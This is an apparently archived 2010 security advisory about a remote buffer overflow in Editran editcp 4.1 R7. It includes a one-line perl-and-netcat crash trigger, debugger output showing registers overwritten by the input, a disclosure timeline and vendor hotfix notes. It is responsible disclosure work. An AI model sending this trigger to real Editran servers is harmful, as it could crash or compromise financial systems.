what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Editran editcp 4.1 R7 Remote Buffer Overflow

Editran editcp 4.1 R7 Remote Buffer Overflow
Posted Jul 6, 2010
Authored by Pedro Andujar

Editran editcp version 4.1 R7 suffers from a remote buffer overflow vulnerability.

tags | exploit, remote, overflow
SHA-256 | f6cf7e0a1f25c0379e532cbc05ba69f842d14168870d4997d94a2bb755af715b

Editran editcp 4.1 R7 Remote Buffer Overflow

Change Mirror Download
          ===============================
- Advisory -
===============================

Tittle: Editran editcp V4.1 R7 - Remote buffer overflow
Risk: High
Date: 25.Jun.2010
Author: Pedro Andujar <pandujar *@* segfault.es>


.: [ INTRO ] :.

EDItran Communications Platform: this is the market standard for the Spanish financial sector in the area of communications.
It comprises an exchange architecture between heterogeneous environments for data networks (tcp, x.25, x.28, LU6.2, SwiftNet)
and the Internet. It is the only product homologated by BDE (Central Bank of Spain) for the transmission of Official Reporting.

This software which is commercialized by Indra, is highly deployed in the financial, inssurance and gubernamental environments.


.: [ TECHNICAL DESCRIPTION ] :.

Editran editcp V4.1 R7 is prone to a remote buffer overflow because the software fails to perform adequate boundary checks on
user-supplied data. This issue could allow a malicious user to perform denial of service attacks or run arbitrary code with the
application context privileges on an affected server.


This issue has been tested on Aix 5.3.9 ppc.


pandujar@ITSec01 /tmp$ perl -e '{print "A"x91}' | nc 192.168.1.164 7777


bash-3.2# tail -f editcp.out
*** Arranque *** - editran - Tue Jun 22 14:53:02 CDT 2010
editcp tcp V4.1 R7 - Jan 22 2007
Copyright (C) 1991-2004 INDRA
22/06/2010 14:53:02.627 editcp (372968) Licencia correcta (tcp).
22/06/2010 14:53:02.627 editcp (372968) LISTEN TCP address 192.168.1.164:7777.
22/06/2010 14:53:36.650 editcp (372968) Recibida señal (sig=11).

bash-3.2# /tmp/dbx -C core
reading symbolic information ...warning: no source compiled with -g

Segmentation fault in lsConnectionCached at 0x10008298
0x10008298 (lsConnectionCached+0x54) 7d69582e lwzx r11,r9,r11

(/tmp/dbx) where
lsConnectionCached(0x41ffffff) at 0x10008298
SOCKSclose(0x41ffffff) at 0x10006548
NetClose() at 0x100036d8
SigHaltHandler(??) at 0x10000958
SearchEvent(??) at 0x100037dc
WaitForIncomingEvent() at 0x10003418
WaitForEvent() at 0x10002e44
main(??, ??) at 0x1000078c

(/tmp/dbx) print $pc
0x10008298

(/tmp/dbx) registers
$r0:0x100036dc $stkp:0x2ff1e090 $toc:0x20082164 $r3:0x41ffffff
$r4:0x00000001 $r5:0x00000000 $r6:0x0000f0b2 $r7:0x00000001
$r8:0x00000001 $r9:0x20083f60 $r10:0x00000002 $r11:0x08282828
$r12:0x40445980 $r13:0x00000000 $r14:0x2ff1e200 $r15:0x000000a1
$r16:0x00000002 $r17:0x200820f8 $r18:0xdeadbeef $r19:0xdeadbeef
$r20:0x0000000b $r21:0x0000000b $r22:0x00012000 $r23:0x2ff47600
$r24:0x00012000 $r25:0x00000000 $r26:0x0101ea00 $r27:0x2370b400
$r28:0x00000000 $r29:0x2009c528 $r30:0x2008ab68 $r31:0x2ff1e090
$iar:0x10008298 $msr:0x0000d0b2 $cr:0x44222224 $link:0x1000654c
$ctr:0x00000000 $xer:0x00000000 $mq:0xdeadbeef

(/tmp/dbx) listi main
0x10000468 (main) 7c6802a6 mflr r3
0x1000046c (main+0x4) 93a1fff4 stw r29,-12(r1)
0x10000470 (main+0x8) 7c9d2378 mr r29,r4
0x10000474 (main+0xc) 93c1fff8 stw r30,-8(r1)
0x10000478 (main+0x10) 3bc00000 li r30,0x0
0x1000047c (main+0x14) 90610008 stw r3,0x8(r1)
0x10000480 (main+0x18) 93e1fffc stw r31,-4(r1)
0x10000484 (main+0x1c) 9421faa8 stwu r1,-1368(r1)
0x10000488 (main+0x20) 80640000 lwz r3,0x0(r4)
0x1000048c (main+0x24) 3880002f li r4,0x2f


If we increment the amount of "A"'s to 100, the whole r3 register is overwritten:

(/tmp/dbx) frame
lsConnectionCached(0x41414141) at 0x10008298

(/tmp/dbx) dump
lsConnectionCached(0x41414141) at 0x100082b4

(/tmp/dbx) listi
0x10008298 (lsConnectionCached+0x54) 7d69582e lwzx r11,r9,r11
0x1000829c (lsConnectionCached+0x58) 7d495838 and r9,r10,r11
0x100082a0 (lsConnectionCached+0x5c) 2c890000 cmpi cr1,0x0,r9,0x0
0x100082a4 (lsConnectionCached+0x60) 40860010 bne cr1,0x100082b4 (lsConnectionCached+0x70)
0x100082a8 (lsConnectionCached+0x64) 48000004 b 0x100082ac (lsConnectionCached+0x68)
0x100082ac (lsConnectionCached+0x68) 38600000 li r3,0x0
0x100082b0 (lsConnectionCached+0x6c) 48000098 b 0x10008348 (lsConnectionCached+0x104)
0x100082b4 (lsConnectionCached+0x70) 60000000 ori r0,r0,0x0
0x100082b8 (lsConnectionCached+0x74) 81220360 lwz r9,0x360(r2)
0x100082bc (lsConnectionCached+0x78) 81690000 lwz r11,0x0(r9)

(/tmp/dbx) listi lsConnectionCached
0x10008244 (lsConnectionCached) 93e1fffc stw r31,-4(r1)
0x10008248 (lsConnectionCached+0x4) 9421ffd8 stwu r1,-40(r1)
0x1000824c (lsConnectionCached+0x8) 7c3f0b78 mr r31,r1
0x10008250 (lsConnectionCached+0xc) 907f0040 stw r3,0x40(r31)
0x10008254 (lsConnectionCached+0x10) 8122033c lwz r9,0x33c(r2)
0x10008258 (lsConnectionCached+0x14) 81690000 lwz r11,0x0(r9)
0x1000825c (lsConnectionCached+0x18) 2c8b0000 cmpi cr1,0x0,r11,0x0
0x10008260 (lsConnectionCached+0x1c) 4186004c beq cr1,0x100082ac (lsConnectionCached+0x68)
0x10008264 (lsConnectionCached+0x20) 813f0040 lwz r9,0x40(r31)
0x10008268 (lsConnectionCached+0x24) 3960ffff li r11,-1


Debug of live process, where the old r3 value is stored on r31:

(/tmp/dbx) run
editcp tcp V4.1 R7 - Jan 22 2007
Copyright (C) 1991-2004 INDRA
25/06/2010 16:31:39.903 editcp (356528) Licencia correcta (tcp).
25/06/2010 16:31:39.903 editcp (356528) LISTEN TCP address 192.168.1.164:7777.

Segmentation fault in SearchEvent at 0x100037dc ($t1)
0x100037dc (SearchEvent+0x10) 7caa202e lwzx r5,r10,r4

(/tmp/dbx) x
$r0:0x00000001 $stkp:0x2ff1e5a0 $toc:0x20082164 $r3:0x00000001
$r4:0x200855f8 $r5:0x200a46c0 $r6:0x00000df0 $r7:0x00000000
$r8:0x00000000 $r9:0xf03a51b0 $r10:0x08282828 $r11:0x00000002
$r12:0x100017bc $r13:0xdeadbeef $r14:0x00000001 $r15:0x2ff22c90
$r16:0x2ff22c98 $r17:0x00000000 $r18:0xdeadbeef $r19:0xdeadbeef
$r20:0xdeadbeef $r21:0xdeadbeef $r22:0xdeadbeef $r23:0x200820ec
$r24:0x100033e0 $r25:0xdeadbeef $r26:0xdeadbeef $r27:0x00000001
$r28:0x00000000 $r29:0x2009c528 $r30:0x20089c18 $r31:0x41414141
$iar:0x100037dc $msr:0x0000d0b2 $cr:0x48222224 $link:0x1000341c
$ctr:0xd03c46fc $xer:0x00000004 $mq:0xdeadbeef

(/tmp/dbx) print $pc
0x100037dc

(/tmp/dbx) listi SearchEvent
0x100037cc (SearchEvent) 80820088 lwz r4,0x88(r2)
0x100037d0 (SearchEvent+0x4) 546ae8fa rlwinm r10,r3,0x1d,0x3,0x1d
0x100037d4 (SearchEvent+0x8) 39600002 li r11,0x2
0x100037d8 (SearchEvent+0xc) 546306fe rlwinm r3,r3,0x0,0x1b,0x1f
0x100037dc (SearchEvent+0x10) 7caa202e lwzx r5,r10,r4
0x100037e0 (SearchEvent+0x14) 7ca41e30 sraw r4,r5,r3
0x100037e4 (SearchEvent+0x18) 70890001 andi. r9,r4,0x1
0x100037e8 (SearchEvent+0x1c) 40820024 bne 0x1000380c (SearchEvent+0x40)
0x100037ec (SearchEvent+0x20) 8102008c lwz r8,0x8c(r2)
0x100037f0 (SearchEvent+0x24) 7cea402e lwzx r7,r10,r8

(/tmp/dbx) listi lsConnectionCached
0x10008244 (lsConnectionCached) 93e1fffc stw r31,-4(r1)
0x10008248 (lsConnectionCached+0x4) 9421ffd8 stwu r1,-40(r1)
0x1000824c (lsConnectionCached+0x8) 7c3f0b78 mr r31,r1
0x10008250 (lsConnectionCached+0xc) 907f0040 stw r3,0x40(r31)
0x10008254 (lsConnectionCached+0x10) 8122033c lwz r9,0x33c(r2)
0x10008258 (lsConnectionCached+0x14) 81690000 lwz r11,0x0(r9)
0x1000825c (lsConnectionCached+0x18) 2c8b0000 cmpi cr1,0x0,r11,0x0
0x10008260 (lsConnectionCached+0x1c) 4186004c beq cr1,0x100082ac (lsConnectionCached+0x68)
0x10008264 (lsConnectionCached+0x20) 813f0040 lwz r9,0x40(r31)
0x10008268 (lsConnectionCached+0x24) 3960ffff li r11,-1


.: [ CHANGELOG ] :.

* 22/Jun/2010: - Vulnerability discovered.
* 22/Jun/2010: - Vendor contacted.
* 23/Jun/2010: - Vendor response providing hotfix.
* 05/Jul/2010: - Public disclosure.


.: [ SOLUTIONS ] :.

Vendor hotfix is available.


.: [ ACKNOWLEDGEMENTS ] :.

Ricardo @Indra for the quick response and patch.


.: [ REFERENCES ] :.

[+] Editran
http://www.editran.info/

[+] Indra
http://www.indracompany.com/en/soluciones-y-servicios/solucion/digital-market/offering

[+] Indra/PPT
http://bit.ly/9JTeiL

[+] Banco de España
http://www.bde.es/webbde/es/secciones/servicio/redbde/redbde.html

[+] !dSR - Digital Security Research
http://www.digitalsec.net/




-=EOF=-

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close